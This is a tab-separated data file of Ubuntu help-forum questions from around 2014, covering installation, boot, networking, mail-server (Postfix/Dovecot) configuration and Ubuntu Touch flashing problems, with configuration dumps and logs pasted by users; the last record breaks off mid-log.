482193	installing lubuntu 14.04 alternate with wubi	i have an old laptop with 256 mb ram with windows xp . it does n't have a working cd/dvd rom and the bios does not allow to boot from usb . is there a way to install lubuntu 14.04 ( alternate version ) through wubi on this system. ? or any method that might work even if i do n't need dual-boot ?
482197	i am one step closer to installing ubuntu , back is grayed out and i was stupid enough to not make a backup	ok , so yeah , i 've been stupid enough not to make a backup and 1 step closer to installing ubuntu . what i need is that is windows totally safe and not gon na be touched i made a new partition from windows , and in ubuntu installer i chose `` something else '' then i chose that partition as an ext4 and mount `` / '' device for bootloader is my hard disk , /dev/sda/ , that 's what keeps me a little aware . so i need a quick answer is my windows 7 gon na be touched ?
482199	sudo apt-get not working	i just reinstalled ubuntu 14.04 . whenever i try to install something using sudo apt-get install it says `` has no installation candidate '' . what do i do ?
482201	problem `` no operational system found '' when booting from usb hdd ( 14.04 lts )	i have a pretty modern ultrabook ( sony vaio pro 13 ) that does n't have an internal hdd or os . i want to use an external hdd , connected via usb , to use as `` an internal drive '' with ubuntu 12.04 installed on it . i 've read threads and answered question on how to do it . in short terms i have : booted my computer from a liveusb pendrive ( works fine ) installed ubuntu on an antother usb-hdd ( with this guide : http : //www.fernhilllinuxproject.com/guidesandhowtos/installubuntutousbdrive.html , works fine ) now when i have successfully installed it on the usb-hdd and tries to boot from it , it says : no operational system found any suggestions why ? boot mode is in legacy , which works when booting from the liveusb .
482205	how to stop playing music when remove headphones ?	i 'm asking for any solution ( algorithm , program installation ... ) to get music stopping when we remove headphones , thank you !
482210	i messed up my /etc/hosts and /etc/resolv.conf files , now my network does n't work . how can i reset it ?	i tweaked my system by installing ftp server and a dns server . i think in the process i messed up resolv.conf and the hosts file . now i want to restore it but am not able to do so . i am using ubuntu 14.04 x86_64 . here is a screenshot that might help :
482211	is it okay to mess around with python that comes with ubuntu ?	i 've just installed ubuntu 14.04 lts and am new to linux . i know that ubuntu 14.04 lts comes with python 3.4.0 . is it okay if i install pip3 and install packages ( e.g . django , numpy , etc . ) on it ? can i also upgrade it to python 3.4.1 ?
482212	view thousands of pdf files one after another from a list	i have taken up a task of manually generating library essential data from huge pdf library ; what i want is : use a script with file names , to open a pdf file instance , review it and after i close current instance subsequent pdf instance is started . is this possible . this doesnt talk about using filenames list .
482213	login screen not showing after connincting to a bigger display ( a monitor ) !	so , i have ubuntu 12.04 lts on my laptop and i got a new monitor so i connected the monitor to the laptop to get a bigger display but the login screen wo n't show . can anyone tell me how do i fix this ? thank you
482217	ubuntu bought a knife and sliced my desktop	i was about to choose the `` your country '' -part . browsing firefox and writing a question and did everything right . and suddenly this happened : i ca n't start ubuntu anymore because this keeps happening . i 'm running windows atm . thank god windows did n't got messed up . so why did this happened ? ideas ?
482218	ubuntu 14.04.. ! ! segmentation fault in running nam	nam_1.15-3.dsc ( 1.7 kib ) nam_1.15.orig.tar.gz ( 4.2 mib ) nam_1.15-3.debian.tar.xz ( 7.1 kib ) among these three which one we have to download for removing segmentation error in ns2 in ubuntu 14.04 ? ? ? ? how to paste a folder from downloads to /usr/local/bin ? ? ? ?
482220	libx11 segmentation fault & no login	i am using ubuntu 14.04 trusty tahr with kernel ( 3.13.29 ) . a couple of days ago the login screen doesnât allow me to login . in the error log there is a gnome-session error segmentation fault on libx11.so.6.3 error 4 this line occurs every time i try to log in . i have a lenovo w530 and i am using the nouveau display driver . i installed the gnome desktop environment , so at login i can choose the environment i want but this has n't solved the problem . i re-installed ubuntu and this error cropped up when i did a distribution upgrade on the system .
482223	postfix postgresql dovecot sasl authentication fails ubuntu 14.04lts server	i previously setup my mail server using ubuntu 12.04lts and all worked fine ( see postfix dovecot sasl authentication not enabled/working ubuntu 12.04 server ) , but i recently moved everything to new server and upgrade to ubuntu 14.04 lts and i lost something in the dovecot sasl configuration because i ca n't authenticate using dovecot sasl ... i get the following error jun 12 05:15:30 example dovecot : auth : error : pgsql ( 192.168.1.11:3145 ) : connect failed to database mwdmail : could not translate host name `` 192.168.1.11:3145 '' to address : name or service not known jun 12 05:15:30 example dovecot : auth : error : pgsql ( 192.168.1.11:3145 ) : connect failed to database mwdmail : could not translate host name `` 192.168.1.11:3145 '' to address : name or service not known jun 12 05:16:31 example dovecot : auth : error : pgsql : query timed out ( no free connections for 61 secs ) : select username as user , password , '/mwdmail/mbox/example.com/cmadm ' as userdb_home , 'maildir : /mwdmail/mbox/example.com/cmadm ' as userdb_mail , 3205 as userdb_uid , 3205 as userdb_gid from mailbox where username='cmadm @ example.com ' and active = true ; jun 12 05:16:31 example dovecot : auth : error : sql ( cmadm @ example.com,127.0.0.1 , < tyikakd74gb/aaab > ) : password query failed : not connected to database jun 12 05:17:44 example dovecot : auth : error : pgsql ( 192.168.1.11:3145 ) : connect failed to database mwdmail : could not translate host name `` 192.168.1.11:3145 '' to address : name or service not known jun 12 05:17:44 example dovecot : auth : error : pgsql ( 192.168.1.11:3145 ) : connect failed to database mwdmail : could not translate host name `` 192.168.1.11:3145 '' to address : name or service not known postconf -n ( main.cf file ) alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes command_directory = /usr/sbin config_directory = /etc/postfix content_filter = amavis : [ 127.0.0.1 ] :10024 daemon_directory = /usr/libexec/postfix data_directory = /var/lib/postfix disable_vrfy_command = yes dovecot_destination_recipient_limit = 1 enable_original_recipient = no header_checks = regexp : /etc/postfix/header_checks inet_interfaces = all inet_protocols = ipv4 local_recipient_maps = $ virtual_mailbox_maps local_transport = virtual mail_owner = mwdpost mailbox_size_limit = 0 mailq_path = /usr/bin/mailq manpage_directory = /usr/local/man mydestination = example.com , localhost.com , localhost mydomain = example.com myhostname = example.com mynetworks = 192.168.1.0/24 , 127.0.0.0/8 mynetworks_style = host myorigin = $ mydomain newaliases_path = /usr/bin/newaliases queue_directory = /var/spool/postfix readme_directory = no recipient_delimiter = + relay_domains = proxy : pgsql : /etc/postfix/pgsql/relay_domains.cf relayhost = setgid_group = mwdpdrop smtp_tls_security_level = may smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtp_use_tls = yes smtpd_banner = $ myhostname esmtp $ mail_name smtpd_client_restrictions = permit_sasl_authenticated , reject_rbl_client zen.spamhaus.org , reject_rbl_client sbl.spamhaus.org , reject_rbl_client blackholes.easynet.nl smtpd_delay_reject = yes smtpd_helo_required = yes smtpd_relay_restrictions = reject_sender_login_mismatch , permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_authenticated_header = yes smtpd_sasl_local_domain = $ myhostname smtpd_sasl_path = private/auth smtpd_sasl_security_options = noanonymous smtpd_sasl_tls_security_options = noanonymous smtpd_sasl_type = dovecot smtpd_sender_login_maps = hash : /etc/postfix/sasl/controlled_envelope_senders smtpd_sender_restrictions = permit_sasl_authenticated , reject_unknown_sender_domain , permit_mynetworks smtpd_tls_auth_only = no smtpd_tls_cert_file = /etc/ssl/certs/ssl-mail.pem smtpd_tls_key_file = /etc/ssl/private/ssl-mail.key smtpd_tls_loglevel = 1 smtpd_tls_mandatory_ciphers = medium smtpd_tls_mandatory_protocols = sslv3 , tlsv1 smtpd_tls_received_header = yes smtpd_tls_security_level = may smtpd_tls_session_cache_timeout = 3600s smtpd_use_tls = yes tls_random_source = dev : /dev/urandom virtual_alias_maps = proxy : pgsql : /etc/postfix/pgsql/virtual_alias_map.cf virtual_gid_maps = static:3205 virtual_mailbox_base = /mwdmail/mbox virtual_mailbox_domains = proxy : pgsql : /etc/postfix/pgsql/virtual_domain_map.cf virtual_mailbox_limit = 512000000 virtual_mailbox_maps = proxy : pgsql : /etc/postfix/pgsql/virtual_mailbox_map.cf virtual_minimum_uid = 3205 virtual_transport = lmtp : unix : private/dovecot-lmtp virtual_uid_maps = static:3205 postconf -m ( master.cf file ) # smtp on port 25 , unencrypted . smtp inet n - - - - smtpd -v smtpd pass - - - - - smtpd -v # smtp with tls on port 587. submission inet n - - - - smtpd -v -o smtpd_tls_security_level=encrypt -o smtpd_sasl_auth_enable=yes -o smtpd_sasl_type=dovecot -o smtpd_sasl_path=private/auth -o smtpd_sasl_security_options=noanonymous -o smtpd_sasl_local_domain= $ myhostname -o smtpd_client_restrictions=permit_sasl_authenticated , reject -o smtpd_sender_login_maps=hash : /etc/postfix/sasl/controlled_envelope_senders # -o smtpd_sender_login_maps=hash : /etc/postfix/virtual -o smtpd_sender_restrictions=reject_sender_login_mismatch -o smtpd_recipient_restrictions=reject_non_fqdn_recipient , reject_unknown_recipient_domain , permit_sasl_authenticated , reject # smtp over ssl on port 465. smtps inet n - - - - smtpd -v -o syslog_name=postfix/smtps -o smtpd_tls_wrappermode=yes -o smtpd_sasl_auth_enable=yes -o smtpd_tls_auth_only=yes -o smtpd_client_restrictions=permit_sasl_authenticated , reject_unauth_destination , reject -o smtpd_sasl_security_options=noanonymous , noplaintext -o smtpd_sasl_tls_security_options=noanonymous # 628 inet n - - - - qmqpd pickup fifo n - - 60 1 pickup -o content_filter= -o receive_override_options=no_header_body_checks cleanup unix n - - - 0 cleanup qmgr fifo n - n 300 1 qmgr # qmgr fifo n - n 300 1 oqmgr tlsmgr unix - - - 1000 ? 1 tlsmgr rewrite unix - - - - - trivial-rewrite bounce unix - - - - 0 bounce defer unix - - - - 0 bounce trace unix - - - - 0 bounce verify unix - - - - 1 verify flush unix n - - 1000 ? 0 flush proxymap unix - - n - - proxymap proxywrite unix - - n - 1 proxymap smtp unix - - - - - smtp relay unix - - - - - smtp # -o smtp_helo_timeout=5 -o smtp_connect_timeout=5 showq unix n - - - - showq error unix - - - - - error retry unix - - - - - error discard unix - - - - - discard local unix - n n - - local virtual unix - n n - - virtual lmtp unix - - - - - lmtp anvil unix - - - - 1 anvil scache unix - - - - 1 scache # maildrop . see the postfix maildrop_readme file for details . # also specify in main.cf : maildrop_destination_recipient_limit=1 # dovecot unix - n n - - pipe flags=drhu user=mwdvm : mwdvm argv=/usr/bin/vendor_perl/spamc -f -e /usr/lib/dovecot/deliver -f $ { sender } -d $ { recipient } uucp unix - n n - - pipe flags=fqhu user=uucp argv=uux -r -n -z -a $ sender - $ nexthop ! rmail ( $ recipient ) # # other external delivery methods . # ifmail unix - n n - - pipe flags=f user=ftn argv=/usr/lib/ifmail/ifmail -r $ nexthop ( $ recipient ) bsmtp unix - n n - - pipe flags=fq . user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t $ nexthop -f $ sender $ recipient scalemail-backend unix - n n - 2 pipe flags=r user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store $ { nexthop } $ { user } $ { extension } mailman unix - n n - - pipe flags=fr user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py $ { nexthop } $ { user } # the next two entries integrate with amavis for anti-virus/spam checks . amavis unix - - - - 3 smtp -o smtp_data_done_timeout=1200 -o smtp_send_xforward_command=yes -o disable_dns_lookups=yes -o max_use=20 127.0.0.1:10025 inet n - - - - smtpd -o content_filter= -o local_recipient_maps= -o relay_recipient_maps= -o smtpd_restriction_classes= -o smtpd_delay_reject=no -o smtpd_client_restrictions=permit_mynetworks , reject -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o smtpd_recipient_restrictions=permit_mynetworks , reject -o smtpd_data_restrictions=reject_unauth_pipelining -o smtpd_end_of_data_restrictions= -o mynetworks=192.168.1.0/32,127.0.0.0/8 # -o mynetworks=0.0.0.0 -o smtpd_error_sleep_time=0 -o smtpd_soft_error_limit=1001 -o smtpd_hard_error_limit=1000 -o smtpd_client_connection_count_limit=0 -o smtpd_client_connection_rate_limit=0 -o receive_override_options=no_header_body_checks , no_unknown_recipient_checks # # # # # # # # # # # # # # # # # integration with dovecot - hand mail over to it for local delivery , and # run the process under the vmail user and mail group . dovecot unix - n n - - pipe flags=drhu user=mwdvm : mwdvm argv=/usr/lib/dovecot/dovecot-lda -d $ ( recipient ) sasl authentication is enabled per telnet check root @ example : ~ # telnet 192.168.1.11 25 trying 192.168.1.11 ... connected to 192.168.1.11 . escape character is '^ ] ' . 220 example.com esmtp postfix ehlo example.com 250-example.com 250-pipelining 250-size 10240000 250-etrn 250-starttls 250-auth plain login 250-auth=plain login 250-enhancedstatuscodes 250-8bitmime 250 dsn doveconf -n # 2.2.9 : /etc/dovecot/dovecot.conf # os : linux 3.13.0-29-generic x86_64 ubuntu 14.04 lts auth_debug = yes auth_debug_passwords = yes auth_mechanisms = plain login auth_verbose = yes first_valid_uid = 3205 last_valid_uid = 3205 mail_gid = mwdvm mail_location = maildir : ~/maildir mail_uid = mwdvm managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i ; ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave namespace inbox { location = mailbox drafts { special_use = \drafts } mailbox junk { special_use = \junk } mailbox sent { special_use = \sent } mailbox `` sent messages '' { special_use = \sent } mailbox trash { special_use = \trash } prefix = } passdb { args = /etc/dovecot/dovecot-sql.conf.ext driver = sql } plugin { sieve = ~/.dovecot.sieve sieve_dir = ~/sieve } postmaster_address = postmaster @ example.com protocols = imap pop3 sieve service auth-worker { user = $ default_internal_user } service auth { unix_listener /var/spool/postfix/private/auth { group = mwdpost mode = 0660 user = mwdpost } unix_listener /var/spool/postfix/private/dovecot-auth { # group = postfix group = mwdpost mode = 0660 # user = postfix user = mwdpost } unix_listener auth-userdb { group = mwdvm mode = 0600 user = mwdvm } user = dovecot } service lmtp { unix_listener /var/spool/postfix/private/dovecot-lmtp { group = mwdpost mode = 0600 user = mwdpost } } ssl_cert = < /etc/dovecot/dovecot.pem ssl_cipher_list = all : ! low : ! sslv2 : all : ! anull : ! adh : ! enull : ! exp : rc4+rsa : +high : +medium ssl_key = < /etc/dovecot/private/dovecot.pem userdb { args = /etc/dovecot/dovecot-sql.conf.ext driver = sql } protocol imap { imap_client_workarounds = delay-newmail mail_max_userip_connections = 10 } protocol pop3 { mail_max_userip_connections = 10 pop3_client_workarounds = outlook-no-nuls oe-ns-eoh } protocol lda { auth_socket_path = /var/run/dovecot/auth-master deliver_log_format = msgid= % m : % $ log_path = /var/log/dovecot-lda.log mail_plugins = sieve postmaster_address = postmaster quota_full_tempfail = yes rejection_reason = your message to < % t > was automatically rejected : % n % r } dovecot authentication file : # this file is opened as root , so it should be owned by root and mode 0600 . # # http : //wiki2.dovecot.org/authdatabase/sql # # for the sql passdb module , you 'll need a database with a table that # contains fields for at least the username and password . if you want to # use the user @ domain syntax , you might want to have a separate domain # field as well . # # if your users all have the same uig/gid , and have predictable home # directories , you can use the static userdb module to generate the home # dir based on the username and domain . in this case , you wo n't need fields # for home , uid , or gid in the database . # # if you prefer to use the sql userdb module , you 'll want to add fields # for home , uid , and gid . here is an example table : # # create table users ( # username varchar ( 128 ) not null , # domain varchar ( 128 ) not null , # password varchar ( 64 ) not null , # home varchar ( 255 ) not null , # uid integer not null , # gid integer not null , # active char ( 1 ) default 'y ' not null # ) ; # database driver : mysql , pgsql , sqlite # driver = driver = pgsql # database connection string . this is driver-specific setting . # # ha / round-robin load-balancing is supported by giving multiple host # settings , like : host=sql1.host.org host=sql2.host.org # # pgsql : # for available options , see the postgresql documention for the # pqconnectdb function of libpq . # use maxconns=n ( default 5 ) to change how many connections dovecot can # create to pgsql . # # mysql : # basic options emulate postgresql option names : # host , port , user , password , dbname # # but also adds some new settings : # client_flags - see mysql manual # ssl_ca , ssl_ca_path - set either one or both to enable ssl # ssl_cert , ssl_key - for sending client-side certificates to server # ssl_cipher - set minimum allowed cipher security ( default : high ) # option_file - read options from the given file instead of # the default my.cnf location # option_group - read options from the given group ( default : client ) # # you can connect to unix sockets by using host : host=/var/run/mysql.sock # note that currently you ca n't use spaces in parameters . # # sqlite : # the path to the database file . # # examples : # connect = host=192.168.1.1 dbname=users # connect = host=sql.example.com dbname=virtual user=virtual password=blarg # connect = /etc/dovecot/authdb.sqlite # # connect = connect = host=192.168.1.11:3145 dbname=mwdmail user=mwdmlusr password=t1mim @ 1l # default password scheme . # # list of supported schemes is in # http : //wiki2.dovecot.org/authentication/passwordschemes # # default_pass_scheme = md5 default_pass_scheme = sha516-crypt # passdb query to retrieve the password . it can return fields : # password - the user 's password . this field must be returned . # user - user @ domain from the database . needed with case-insensitive lookups . # username and domain - an alternative way to represent the `` user '' field . # # the `` user '' field is often necessary with case-insensitive lookups to avoid # e.g . `` name '' and `` name '' logins creating two different mail directories . if # your user and domain names are in separate fields , you can return `` username '' # and `` domain '' fields instead of `` user '' . # # the query can also return other fields which have a special meaning , see # http : //wiki2.dovecot.org/passworddatabase/extrafields # # commonly used available substitutions ( see http : //wiki2.dovecot.org/variables # for full list ) : # % u = entire user @ domain # % n = user part of user @ domain # % d = domain part of user @ domain # # note that these can be used only as input to sql query . if the query outputs # any of these substitutions , they 're not touched . otherwise it would be # difficult to have eg . usernames containing ' % ' characters . # # example : # password_query = select userid as user , pw as password \ # from users where userid = ' % u ' and active = 'y' # # password_query = \ # select username , domain , password \ # from users where username = ' % n ' and domain = ' % d' password_query = \ select username as user , password , '/mwdmail/mbox/ % d/ % n ' as userdb_home , 'maildir : /mwdmail/mbox/ % d/ % n ' as userdb_mail , 3205 as userdb_uid , 3205 as userdb_gid \ from mailbox where username= ' % u ' and active = true ; # userdb query to retrieve the user information . it can return fields : # uid - system uid ( overrides mail_uid setting ) # gid - system gid ( overrides mail_gid setting ) # home - home directory # mail - mail location ( overrides mail_location setting ) # # none of these are strictly required . if you use a single uid and gid , and # home or mail directory fits to a template string , you could use userdb static # instead . for a list of all fields that can be returned , see # http : //wiki2.dovecot.org/userdatabase/extrafields # # examples : # user_query = select home , uid , gid from users where userid = ' % u' # user_query = select dir as home , user as uid , group as gid from users where userid = ' % u' # user_query = select home , 501 as uid , 501 as gid from users where userid = ' % u' # # user_query = \ # select home , uid , gid \ # from users where username = ' % n ' and domain = ' % d' user_query = \ select '/mwdmail/mbox/ % d/ % n ' as home , 'maildir : /mwdmail/mbox/ % d/ % n ' as mail , 3205 as uid , 3205 as gid , 'dirsize : storage= ' || quota as quota from mailbox where username = ' % u ' and active = true # if you wish to avoid two sql lookups ( passdb + userdb ) , you can use # userdb prefetch instead of userdb sql in dovecot.conf . in that case you'll # also have to return userdb fields in password_query prefixed with `` userdb_ '' # string . for example : # password_query = \ # select userid as user , password , \ # home as userdb_home , uid as userdb_uid , gid as userdb_gid \ # from users where userid = ' % u' # query to get a list of all usernames . # iterate_query = select username as user from users i can do the following : send email to external address from commandline root account send email to local and virtual mailboxes from commandline root account receive email to a virtual mailbox from external email accounts * i can not do the following : receive email to a virtual mailbox from external email accounts ( *this is fixed ) log into a virtual mailbox from a remote client like thunderbird or roundcube i know there must be some configuration i missing or mixing up . please help . thanks * **updated * 6/13/2014 ***** per @ clement , i updated the post with the files and while doing dovecot -n. i noticed i had the wrong userid/groupid in file /etc/dovecot/conf.d/99-mail-stack-delivery.conf.ext corrected it and then the error went away . i also can receive email from external accounts , but i get a new error and when i try to connect through thunderbird or roundcube the same error ( posted above appears ) new error ( from syslog ) jun 13 12:48:59 example amavis [ 1636 ] : ( 01636-01 ) connecting to sql database server jun 13 12:48:59 example amavis [ 1636 ] : ( 01636-01 ) connect_to_sql : 'dbi : pg : database=mwdmail ; host=192.168.1.11 ; port=3145 ' succeeded jun 13 12:48:59 example amavis [ 1636 ] : ( 01636-01 ) esmtp : :10024 /var/lib/amavis/tmp/amavis-20140613t124859-01636-8zgftr8g : < myemailid @ gmail.com > - > < cmadm @ example.com > size=1994 received : from example.com ( [ 127.0.0.1 ] ) by localhost ( example.com [ 127.0.0.1 ] ) ( amavisd-new , port 10024 ) with esmtp for < cmadm @ example.com > ; fri , 13 jun 2014 12:48:59 -0400 ( edt ) jun 13 12:48:59 example amavis [ 1636 ] : ( 01636-01 ) body hash : 3c1b1ba2edc70e49703dfd1f314cbf88 jun 13 12:48:59 example amavis [ 1636 ] : ( 01636-01 ) dkim : failed author+sender+mailfrom signature by d=gmail.com , from : < myemailid @ gmail.com > , a=rsa-sha256 , c=relaxed/relaxed , s=20120113 , i= @ gmail.com , fail ( message has been altered ) jun 13 12:48:59 example amavis [ 1636 ] : ( 01636-01 ) checking : ir664hlqxajx [ 209.85.128.170 ] < myemailid @ gmail.com > - > < cmadm @ example.com > jun 13 12:48:59 example amavis [ 1636 ] : ( 01636-01 ) 2822.from : < myemailid @ gmail.com > jun 13 12:48:59 example amavis [ 1636 ] : ( 01636-01 ) p001 1 content-type : text/plain , size : 769 b , name : jun 13 12:49:00 example amavis [ 1636 ] : ( 01636-01 ) checking for banned types and filenames jun 13 12:49:00 example amavis [ 1636 ] : ( 01636-01 ) collect banned table [ 0 ] : cmadm @ example.com , tables : default= > amavis : :lookup : :re=array ( 0x2541dc0 ) jun 13 12:49:00 example amavis [ 1636 ] : ( 01636-01 ) p.path cmadm @ example.com : `` p=p001 , l=1 , m=text/plain , t=asc '' jun 13 12:49:00 example amavis [ 1636 ] : ( 01636-01 ) run_av using ( clamav-clamd ) : ( code ) contscan /var/lib/amavis/tmp/amavis-20140613t124859-01636-8zgftr8g/parts\n jun 13 12:49:00 example amavis [ 1636 ] : ( 01636-01 ) clamav-clamd : connecting to socket /var/run/clamav/clamd.ctl jun 13 12:49:00 example amavis [ 1636 ] : ( 01636-01 ) new socket by io : :socket : :unix to /var/run/clamav/clamd.ctl , timeout 10 jun 13 12:49:00 example amavis [ 1636 ] : ( 01636-01 ) clamav-clamd : sending contscan /var/lib/amavis/tmp/amavis-20140613t124859-01636-8zgftr8g/parts\n to socket /var/run/clamav/clamd.ctl jun 13 12:49:00 example amavis [ 1636 ] : ( 01636-01 ) rw_loop read : got eof jun 13 12:49:00 example amavis [ 1636 ] : ( 01636-01 ) run_av ( clamav-clamd ) : clean jun 13 12:49:00 example amavis [ 1636 ] : ( 01636-01 ) run_av ( clamav-clamd ) result : clean
482231	upgrading from 12.04 to 14.04 . will the ros packages i 've installed previously be retained ?	i have ros hydro installed in my ubuntu 12.04 . i 'm thinking of upgrading it to trusty tahr . i 'm worried if i will lose all my packages that i had previously installed . i dont want to take the 'backup all files ' route . can i proceed with the upgrade ?
482232	ubuntu is hanging in initramfs	i was trying to install ubuntu on my friends machine but the usb stick hung up in initramfs displaying error filesystem can not be mounted . he is currently using windows 8.1 . the same usb-stick was working fine with my computer . his machine is hp 's pavilion series .
482237	minecraft shaders not working	i keep trying but minecraft will not let me run minecraft with shaders ! basically it does work but i keep seeing through blocks and i can see all the caves and stuff underneath the land ! how can i run it with shaders ?
482238	need help to solve error during software update process	i have recently upgraded ubuntu 12.04 to 14.04 . now i could not make software updating using software updater , while i 'm doing that it showed a message `` package operation failed `` . how i can solve this problem
482239	change guest username	now , looking around on google shows me some ways in which to customise the settings of the guest session . but , i would love a way to change the name of the guest account . basically , i 'm planning to take some laptops out to a school in africa and want to rename the `` guest '' account in 14.04 to `` student '' so the students use that . they tend to store stuff on usb sticks and they 're using the guest account so they ca n't break anything . edit : i 'll expand on this slightly . they 're using the guest account simply for the reason it does n't save anything after logoff . this was a specific thing the teachers have asked for . i do n't mind if the actual username remains guest behind the scenes , but as long as it shows up as student to on unity . any way of going about this ?
482241	some files in downloads folder getting deleted automatically	some of the document ( .pdf ) files that i downloaded from internet , were saved in ~/downloads folder . these got deleted automatically on reboot . this has happened to me thrice now . i have checked files in downloads folder deleted automatically but it did n't help . any logs that i can check as to what is causing this deletion ?
482243	windows7 can not find ubuntu partition	i recently partitioned my hard drive which was running on ubuntu 14.04lts , using a usb flash . then i installed windows7 on the new partition . now i can not find the ubuntu os . i expected at startup to be given the option of running either ubuntu or windows7 but i found that windows just runs by default . any suggestions on what i can do to resurrect the ubuntu ?
482251	putty highlighting copying	i currently use putty at my work and i am always fascinating by how useful the highlight copying tool is . is there any kind of program i can download on my system 76 laptop that i can use when i am in the terminal that will allow the same feature ?
482256	installing ubuntu on a usb 3.0 stick ? suggestions	i 've installed ubuntu 12.04 on an 16gb flash usb 3.0 stick and performances are quite good however i wonder whether installing it on an external usb 3.0 hard drive would increase the general speed . i know that i have to check the max writing/reading speed of the device but i read that even if the usb flash sticks can be faster they are not optimized for multiple w/r operations ( they are not thought to be used by an os i guess ) vice versa the external hdd . is that true ? is there any command useful to reduce the amount of w/r operations from/to the usb device ? i used these commands but i am not sure ( i am quite new with ubuntu ) sudo vi /etc/cron.daily/trim copy/paste this # ! /bin/sh log=/var/log/trim.log echo `` *** $ ( date -r ) *** '' > > $ lo fstrim -v / > > $ log and make it executable sudo chmod +x /etc/cron.daily/trim does it work ? how to check ? also , how to create a further partition on my usb stick that can still be used as normal pen drive for exchanging files ? i tried to create a fat32 partition using the ubuntu live cd but it is invisible for other oss . many thanks .
482257	adding languages to gedit spellchecker	it 's all in the title . by language i mean human language that are not included in the default version ( say dutch , german , spanish , ect ... ) . i 'm using gedit 3.4.x .
482261	openvpn keeps disconnecting	i have a openvpn configuration that i use to connect to the internet through vpn on ubuntu 14.04 . however , every time when the connection is idle for about 5 minutes , i can no longer access the internet . openvpn stays connected according to the network manager , but i can not open any website , so the connection at that point is obviously down . it is getting really frustrating , i have tried adding `` keepalive '' command in the .ovpn configuration file , as well as `` ping '' and `` ping-restart '' , but they had no effect at all . how do i keep vpn connected ? thanks .
482264	unable to install ubuntu touch on nexus 4	i 've done all commands but the loading continues.. seems that i got errors during my installation hanafi81 @ hanafi81 ~ $ adb devices list of devices attached 02288e089196d0c7 offline hanafi81 @ hanafi81 ~ $ adb devices list of devices attached 02288e089196d0c7 offline hanafi81 @ hanafi81 ~ $ adb reboot bootloader error : device offline hanafi81 @ hanafi81 ~ $ ./adb sideload bash : ./adb : no such file or directory hanafi81 @ hanafi81 ~ $ adb devices list of devices attached 02288e089196d0c7 offline hanafi81 @ hanafi81 ~ $ adb devices list of devices attached hanafi81 @ hanafi81 ~ $ adb devices list of devices attached hanafi81 @ hanafi81 ~ $ adb devices list of devices attached hanafi81 @ hanafi81 ~ $ ./adb sideload bash : ./adb : no such file or directory hanafi81 @ hanafi81 ~ $ adb devices list of devices attached 02288e089196d0c7 sideload hanafi81 @ hanafi81 ~ $ adb devices list of devices attached hanafi81 @ hanafi81 ~ $ adb devices list of devices attached hanafi81 @ hanafi81 ~ $ adb devices list of devices attached hanafi81 @ hanafi81 ~ $ adb devices list of devices attached 02288e089196d0c7 recovery hanafi81 @ hanafi81 ~ $ ubuntu-device-flash -- list-channels devel-proposed ( alias to ubuntu-touch/utopic-proposed ) devel-proposed-customized ( alias to ubuntu-touch/utopic-proposed-customized ) ubuntu-touch/saucy ubuntu-touch/saucy-customized ubuntu-touch/trusty ubuntu-touch/trusty-customized ubuntu-touch/utopic-proposed-customized-generic devel ( alias to ubuntu-touch/utopic ) devel-customized-generic ( alias to ubuntu-touch/utopic-customized-generic ) trusty-proposed-customized-demo ubuntu-touch/saucy-proposed-customized ubuntu-touch/saucy-surfaceflinger ubuntu-touch/trusty-proposed-customized ubuntu-touch/utopic-customized saucy saucy-customized trusty trusty-customized ubuntu-touch/devel-proposed ( alias to ubuntu-touch/utopic-proposed ) ubuntu-touch/devel-proposed-customized ( alias to ubuntu-touch/utopic-proposed-customized ) ubuntu-touch/utopic-proposed-customized-demo saucy-proposed-customized saucy-surfaceflinger trusty-proposed-customized ubuntu-touch/devel ( alias to ubuntu-touch/utopic ) ubuntu-touch/devel-customized-generic ( alias to ubuntu-touch/utopic-customized-generic ) ubuntu-touch/trusty-proposed-customized-demo ubuntu-touch/utopic-customized-demo devel-proposed-customized-generic ( alias to ubuntu-touch/utopic-proposed-customized-generic ) trusty-customized-demo ubuntu-touch/devel-proposed-customized-demo ( alias to ubuntu-touch/utopic-proposed-customized-demo ) ubuntu-touch/stable ( alias to ubuntu-touch/stable ) ubuntu-touch/trusty-customized-generic ubuntu-touch/utopic-proposed ubuntu-touch/utopic-proposed-customized devel-customized ( alias to ubuntu-touch/utopic-customized ) ubuntu-touch/devel-customized-demo ( alias to ubuntu-touch/utopic-customized-demo ) ubuntu-touch/saucy-proposed ubuntu-touch/trusty-proposed ubuntu-touch/trusty-proposed-customized-generic ubuntu-touch/utopic ubuntu-touch/utopic-customized-generic stable ( alias to ubuntu-touch/stable ) trusty-customized-generic ubuntu-touch/devel-proposed-customized-generic ( alias to ubuntu-touch/utopic-proposed-customized-generic ) ubuntu-touch/trusty-customized-demo saucy-proposed trusty-proposed trusty-proposed-customized-generic ubuntu-touch/devel-customized ( alias to ubuntu-touch/utopic-customized ) hanafi81 @ hanafi81 ~ $ ubuntu-device-flash -- channel=devel-proposed 2014/06/12 18:33:13 expecting the device to expose an adb interface ... 2014/06/12 18:33:13 device is |mako| 2014/06/12 18:33:16 flashing version 79 from devel-proposed channel and server https : //system-image.ubuntu.com to device mako 2014/06/12 18:33:16 ubuntu-touch/utopic-proposed is a channel alias to devel-proposed 2014/06/12 18:33:21 start pushing /home/hanafi81/.cache/ubuntuimages/pool/device-8e3e30aa503cbe9b6fdf3497ad5cf38398f8bcf88c80d98a988a4ad464b3db28.tar.xz to device 2014/06/12 18:33:21 start pushing /home/hanafi81/.cache/ubuntuimages/ubuntu-touch/devel-proposed/mako/version-79.tar.xz to device 2014/06/12 18:33:21 start pushing /home/hanafi81/.cache/ubuntuimages/gpg/image-signing.tar.xz to device 2014/06/12 18:33:21 start pushing /home/hanafi81/.cache/ubuntuimages/gpg/image-master.tar.xz to device 224.00 kb / 334.17 mb [ _______________________________ ] 0.07 % 983.71 kb/s 5m47s2014/06/12 18:33:21 done pushing /home/hanafi81/.cache/ubuntuimages/gpg/image-signing.tar.xz to device 2014/06/12 18:33:21 done pushing /home/hanafi81/.cache/ubuntuimages/ubuntu-touch/devel-proposed/mako/version-79.tar.xz to device 2014/06/12 18:33:21 done 